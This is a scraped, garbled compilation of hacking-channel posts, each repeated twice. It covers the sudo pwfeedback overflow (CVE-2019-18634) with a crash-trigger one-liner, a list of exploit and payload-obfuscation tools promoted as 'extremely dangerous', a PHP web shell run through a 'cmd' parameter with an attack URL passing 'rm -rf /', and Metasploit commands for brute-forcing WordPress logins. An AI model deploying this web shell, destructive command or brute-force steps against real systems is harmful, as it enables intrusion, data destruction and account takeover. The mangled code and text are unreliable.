"Although there are logic errors in the 1.8.26 to 1.8.30 versions of sudo, the vulnerabilities could not be exploited due to changes in EOF processing after 1.8.26." Miller explained.
6) In October 2019, Vennix discovered a Sudo bypass issue. Even if "sudo user configuration" does not allow root access, a malicious user or malicious program can still execute arbitrary commands as the root user on the target Linux system, and this big is patched on undercode os today/and in debian yesterday
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦2020 Vulnerabilty from twitter.com/UndercOdeTC
> Sudo vulnerability allows unprivileged Linux and macOS users to run commands as root
π¦ cyber-security-3400657_640
Sudo vulnerability allows unprivileged Linux and macOS users to run commands as root
Author: @UndercOdeOfficialn Date: 2020-02-04 Category: security alerts , vulnerability events
> Apple security expert Joe Vennix has discovered a vulnerability (CVE-2019-18634) that allows unprivileged Linux and macOS users to run commands as root.
> This vulnerability can only be exploited in special configurations.
> The vulnerability can only be exploited if the "pwfeedback" option has been enabled in the sudo configuration file. The pwfeedback option for root allows visual feedback when the user enters a password.
> Experts point out that this vulnerability can be triggered even if the user is not in the user file.
π¦ ππΌππ πππΈβπ :
1) "You do not need root privileges to trigger this vulnerability, you just need to enable pwfeedback." Sudo developer Todd C. Miller wrote.
2) "When entering the password, you can enter sudo through the pipe to reproduce it. For example:"
$ perl -e 'print (("A" x 100. "\ x {00}") x 50)' | sudo -S id
Password: Segmentation fault
There are two reasons for this vulnerability:
3) The pwfeedback option is generally not ignored when reading from devices other than the terminal device. Due to the lack of a terminal, the version of the line erase character is always an initial value of 0.
If there is a write error, the code that erases the asterisk line will not reset the buffer position correctly, but it will reset the remaining buffer length. This will cause the getln () function to be written outside the buffer. "
4) If this option is enabled, you can change "Defaults pwfeedback" to "Defaults! Pwfeedback" in the user profile.
5) The sudo maintainer released version 1.8.31 of root.
"Although there are logic errors in the 1.8.26 to 1.8.30 versions of sudo, the vulnerabilities could not be exploited due to changes in EOF processing after 1.8.26." Miller explained.
6) In October 2019, Vennix discovered a Sudo bypass issue. Even if "sudo user configuration" does not allow root access, a malicious user or malicious program can still execute arbitrary commands as the root user on the target Linux system, and this big is patched on undercode os today/and in debian yesterday
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦TOP EXTREMLY DAGEROUS HACKING TOOLS/ accounts-cards-modding... TERMUX-KALI-PARROT...
> EXPLOITE TOOLS 2019-2020
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
1) WinRAR Remote Code Execution Proof of Concept exploit for CVE-2018-20250. https://github.com/WyAtu/CVE-2018-20250
2) Composite Moniker Proof of Concept exploit for CVE-2017-8570. https://github.com/rxwx/CVE-2017-8570
3) Exploit toolkit CVE-2017-8759 is a handy python script which provides pentesters and security researchers a quick and effective way to test
4) Microsoft .NET Framework RCE. https://github.com/bhdresh/CVE-2017-8759
CVE-2017-11882 Exploit accepts over 17k bytes long command/code in maximum. https://github.com/unamer/CVE-2017-11882
5) Adobe Flash Exploit CVE-2018-4878. https://github.com/anbai-inc/CVE-2018-4878
6) Exploit toolkit CVE-2017-0199 is a handy python script which provides pentesters and security researchers a quick and effective way to test
7) Microsoft Office RCE. https://github.com/bhdresh/CVE-2017-0199
demiguise is a HTA encryption tool for RedTeams. https://github.com/nccgroup/demiguise
8) Office-DDE-Payloads collection of scripts and templates to generate Office documents embedded with the DDE, macro-less command execution technique. https://github.com/0xdeadbeefJERKY/Office-DDE-Payloads
9) CACTUSTORCH Payload Generation for Adversary Simulations. https://github.com/mdsecactivebreach/CACTUSTORCH
10) SharpShooter is a payload creation framework for the retrieval and execution of arbitrary CSharp source code. https://github.com/mdsecactivebreach/SharpShooter
11) Don't kill my cat is a tool that generates obfuscated shellcode that is stored inside of polyglot images. The image is 100% valid and also 100% valid shellcode. https://github.com/Mr-Un1k0d3r/DKMC
12) Malicious Macro Generator Utility Simple utility design to generate obfuscated macro that also include a AV / Sandboxes escape
mechanism. https://github.com/Mr-Un1k0d3r/
13) MaliciousMacroGenerator
SCT Obfuscator Cobalt Strike SCT payload obfuscator. https://github.com/Mr-Un1k0d3r/SCT-obfuscator
@UndercOdeTesting
14) Invoke-Obfuscation PowerShell Obfuscator. https://github.com/danielbohannon/Invoke-Obfuscation
15) Invoke-CradleCrafter PowerShell remote download cradle generator and obfuscator. https://github.com/danielbohannon/Invoke-CradleCrafter
16) Invoke-DOSfuscation cmd.exe Command Obfuscation Generator & Detection Test Harness. https://github.com/danielbohannon/Invoke-DOSfuscation
17) morphHTA Morphing Cobalt Strike's evil.HTA. https://github.com/vysec/morphHTA
Unicorn is a simple tool for using a PowerShell downgrade attack and
18) inject shellcode straight into memory. https://github.com/trustedsec/unicorn
U S E FOR Learning Only !!!!
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦TOP EXTREMLY DAGEROUS HACKING TOOLS/ accounts-cards-modding... TERMUX-KALI-PARROT...
> EXPLOITE TOOLS 2019-2020
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
1) WinRAR Remote Code Execution Proof of Concept exploit for CVE-2018-20250. https://github.com/WyAtu/CVE-2018-20250
2) Composite Moniker Proof of Concept exploit for CVE-2017-8570. https://github.com/rxwx/CVE-2017-8570
3) Exploit toolkit CVE-2017-8759 is a handy python script which provides pentesters and security researchers a quick and effective way to test
4) Microsoft .NET Framework RCE. https://github.com/bhdresh/CVE-2017-8759
CVE-2017-11882 Exploit accepts over 17k bytes long command/code in maximum. https://github.com/unamer/CVE-2017-11882
5) Adobe Flash Exploit CVE-2018-4878. https://github.com/anbai-inc/CVE-2018-4878
6) Exploit toolkit CVE-2017-0199 is a handy python script which provides pentesters and security researchers a quick and effective way to test
7) Microsoft Office RCE. https://github.com/bhdresh/CVE-2017-0199
demiguise is a HTA encryption tool for RedTeams. https://github.com/nccgroup/demiguise
8) Office-DDE-Payloads collection of scripts and templates to generate Office documents embedded with the DDE, macro-less command execution technique. https://github.com/0xdeadbeefJERKY/Office-DDE-Payloads
9) CACTUSTORCH Payload Generation for Adversary Simulations. https://github.com/mdsecactivebreach/CACTUSTORCH
10) SharpShooter is a payload creation framework for the retrieval and execution of arbitrary CSharp source code. https://github.com/mdsecactivebreach/SharpShooter
11) Don't kill my cat is a tool that generates obfuscated shellcode that is stored inside of polyglot images. The image is 100% valid and also 100% valid shellcode. https://github.com/Mr-Un1k0d3r/DKMC
12) Malicious Macro Generator Utility Simple utility design to generate obfuscated macro that also include a AV / Sandboxes escape
mechanism. https://github.com/Mr-Un1k0d3r/
13) MaliciousMacroGenerator
SCT Obfuscator Cobalt Strike SCT payload obfuscator. https://github.com/Mr-Un1k0d3r/SCT-obfuscator
@UndercOdeTesting
14) Invoke-Obfuscation PowerShell Obfuscator. https://github.com/danielbohannon/Invoke-Obfuscation
15) Invoke-CradleCrafter PowerShell remote download cradle generator and obfuscator. https://github.com/danielbohannon/Invoke-CradleCrafter
16) Invoke-DOSfuscation cmd.exe Command Obfuscation Generator & Detection Test Harness. https://github.com/danielbohannon/Invoke-DOSfuscation
17) morphHTA Morphing Cobalt Strike's evil.HTA. https://github.com/vysec/morphHTA
Unicorn is a simple tool for using a PowerShell downgrade attack and
18) inject shellcode straight into memory. https://github.com/trustedsec/unicorn
U S E FOR Learning Only !!!!
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Hacking an Ubuntu Linux System with PHP :
instagram.com/UnderCodeTesting
π¦ ππΌππ πππΈβπ :
> In this practical scenario, we will provide you with basic information on how to use PHP to disrupt Linux.
> We will not target any victims. If you want to try it out, you can install LAMPP on your local computer.
1) PHP comes with two functions that can be used to execute Linux commands. It has exec () and shell_exec () functions. The function exec () returns the last line of command output, while shell_exec () returns the entire result of the command as a string.
2) For demonstration purposes, let us assume that the attacker administrator uploads the following files on a web server.
<? PHP $ cmd = isset ($ _ GET ['cmd'])? $ _GET ['cmd']: 'ls -l'; echo "execute a shell command:-> $ cmd </ br>"; $ output = shell_exec ($ cmd); echo "
<pre> $ output </ pre> ";? > Here above script gets commands from the GET variable named cmd in. The command is executed using shell_exec () and returns the result in the browser. You can use the above code HTTP using the following URL : //localhost/cp/konsole.php CMD = LS% 20 liters
3) "... konsole.php? Cmd = ls% 20-l" assigns the value ls -l to the variable cmd .
The command executed against the server will be
4) See That Picture By UndercODE
> The above command only shows the files and permissions in the current directory.
Assuming the attacker passes the command
rm -rf /
here,
"Rm" delete file
"Rf" causes the rm command to run in recursive mode. Delete all folders and files
"/" Instructs the command to start deleting files from the root directory
The attack URL looks like this
HTTP: //localhost/cp/konsole.php CMD = RM% 20-RF% 20 /
written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Hacking an Ubuntu Linux System with PHP :
instagram.com/UnderCodeTesting
π¦ ππΌππ πππΈβπ :
> In this practical scenario, we will provide you with basic information on how to use PHP to disrupt Linux.
> We will not target any victims. If you want to try it out, you can install LAMPP on your local computer.
1) PHP comes with two functions that can be used to execute Linux commands. It has exec () and shell_exec () functions. The function exec () returns the last line of command output, while shell_exec () returns the entire result of the command as a string.
2) For demonstration purposes, let us assume that the attacker administrator uploads the following files on a web server.
<? PHP $ cmd = isset ($ _ GET ['cmd'])? $ _GET ['cmd']: 'ls -l'; echo "execute a shell command:-> $ cmd </ br>"; $ output = shell_exec ($ cmd); echo "
<pre> $ output </ pre> ";? > Here above script gets commands from the GET variable named cmd in. The command is executed using shell_exec () and returns the result in the browser. You can use the above code HTTP using the following URL : //localhost/cp/konsole.php CMD = LS% 20 liters
3) "... konsole.php? Cmd = ls% 20-l" assigns the value ls -l to the variable cmd .
The command executed against the server will be
4) See That Picture By UndercODE
> The above command only shows the files and permissions in the current directory.
Assuming the attacker passes the command
rm -rf /
here,
"Rm" delete file
"Rf" causes the rm command to run in recursive mode. Delete all folders and files
"/" Instructs the command to start deleting files from the root directory
The attack URL looks like this
HTTP: //localhost/cp/konsole.php CMD = RM% 20-RF% 20 /
written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Web Hacking/ Wordpress- Brute force attack using metasploit
fb.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
1) This module will test WordPress logins on a series of computers and report successful logins.
2) If you have loaded the database plugin and connected to the database of this module, it will log successful logins and hosts so you can track your visits.
msf>useauxiliary/scanner/http/wordpress_login_enummsfauxiliary(wordpress_login_enum)>setrhosts192.168.1.4msfauxiliary(wordpress_login_enum)>setrport80msfauxiliary(wordpress_login_enum)>setuser_file/root/
> Desktop / user . Txt
msf auxiliary ( wordpress_login_enum ) > set pass_file / root / Desktop / pass . Txt msf auxiliary ( wordpress_login_enum ) > exploit WordPress brute force successful login user: bitnami as the username and password.
written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Web Hacking/ Wordpress- Brute force attack using metasploit
fb.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
1) This module will test WordPress logins on a series of computers and report successful logins.
2) If you have loaded the database plugin and connected to the database of this module, it will log successful logins and hosts so you can track your visits.
msf>useauxiliary/scanner/http/wordpress_login_enummsfauxiliary(wordpress_login_enum)>setrhosts192.168.1.4msfauxiliary(wordpress_login_enum)>setrport80msfauxiliary(wordpress_login_enum)>setuser_file/root/
> Desktop / user . Txt
msf auxiliary ( wordpress_login_enum ) > set pass_file / root / Desktop / pass . Txt msf auxiliary ( wordpress_login_enum ) > exploit WordPress brute force successful login user: bitnami as the username and password.
written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β